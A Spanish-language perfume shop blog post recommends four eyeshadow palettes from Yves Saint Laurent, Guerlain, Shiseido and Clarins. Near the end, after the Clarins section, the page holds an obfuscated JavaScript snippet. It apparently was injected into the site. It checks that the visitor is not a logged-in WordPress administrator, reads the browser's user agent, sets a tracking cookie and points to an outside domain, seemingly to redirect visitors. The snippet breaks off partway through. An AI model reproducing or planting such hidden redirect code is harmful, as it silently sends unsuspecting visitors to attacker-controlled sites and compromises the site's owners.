‘Sombra aquí, sombra allá, ¡maquíllate, maquíllate!’, cantaba Mecano. Y es que, efectivamente, la aplicación de la sombra de ojos es un paso imprescindible en tu ritual de maquillaje para lograr un ‘total look’ de mirada espectacular. Es por esto que hoy, en nuestro blog, queremos recomendar cuatro sombras de ojos de algunas de las marcas más prestigiosas que podréis encontrar en Perfumerías Tin Tin.

yves sombra

La paleta de sombras de ojos de Yves Saint Laurent ofrece cinco tonos específicamente seleccionados para esculpir y dar luminosidad a tu mirada. Para lograr un efecto radiante, lo más recomendable es aplicar el tono más claro de la paleta por todo el párpado, añadiendo un tono medio por la zona del pliegue del ojo y, finalmente, el tono oscuro por la línea más pegada a las pestañas. Para terminar, hay que difuminar las sombras para conseguir un maquillaje de acabado profesional y una mirada profunda y penetrante.

 

guerlain sombra

La fórmula y la textura de la paleta de sombras de ojos de Guerlain Écrin 5 couleurs incorporan la nueva tecnología de pigmentos de luz, que refleja la luz y garantiza un maquillaje luminoso incluso cuando la textura es mate. Esta atractiva paleta consigue que la mirada luzca más vibrante, como si se hubiera incrementado, logrando una profundidad realmente espectacular. La paleta incluye tres tipos de texturas: la mate, la satinada y la metálica, además de una base para iluminar, dos naturales para un aspecto nude y dos ahumandos para un look smokey. El packaging, de diseño elegante y fino, completa la paleta con dos aplicadores: un pincel de doble punta para una aplicación sutil y de gran precisión y otro pincel de espuma para una cobertura intensa.

shisheido sombra

La sombra de ojos Shiseido Luminizing Satin Eyecolor Trio es una paleta que te ofrece tres tonos exquisitos y de texturas únicas para ampliar notablemente el abanico de posibilidades en tu maquillaje de ojos. Esta propuesta combina colores atractivos y texturas delicadas para lograr un acabado sublime, dulce, dramático o simplemente único con una sola paleta. Las combinaciones que permite son realmente versátiles y variadas, y, además, se consigue un maquillaje de ojos de larga duración y gran fidelidad del color. Esta paleta incorpora los colores más avanzados de Shisheidotecnología de la luz. Además, sus ingredientes protegen el párpado de la sequedad y, entre otros principios activos, contiene Hydro-Wrap Vitalizing.

clarins_sombra_ojos

Para terminar con estas sugerencias de sombras de ojos, proponemos la paleta de Clarins Ombre 4 Couleurs, que ofrece cuatro preciosos colores que contienen una alta concentración de pigmentos minerales, los cuales contribuyen a iluminar la mirada al máximo. La textura de estas sombras permite una aplicación tanto húmeda como seca, pero siempre muy suave. Si se desea multiplicar los efectos de su aplicación, se pueden complementar las harmonías cromáticas de los tonos satinados con los tonos irisados. El acabado resulta magnífico, con un maquillaje maravilloso y de larga duración.

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone